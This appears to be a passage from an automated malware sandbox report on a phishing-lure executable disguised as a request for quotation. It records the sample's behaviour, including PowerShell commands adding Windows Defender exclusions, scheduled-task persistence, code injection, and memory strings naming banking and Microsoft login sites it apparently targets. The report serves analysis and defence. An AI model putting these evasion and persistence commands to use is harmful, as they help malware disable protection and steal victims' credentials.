Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Thread delayed: delay time: 594593 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599558
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598451
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598316
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 596030
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595774
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595504
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594936
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Thread delayed: delay time: 594281
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4515858199.000000000139E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4516378063.0000000001346000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9548 LdrInitializeThunk, 14_2_06DB9548
Enables debug privileges
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Memory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Memory written: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
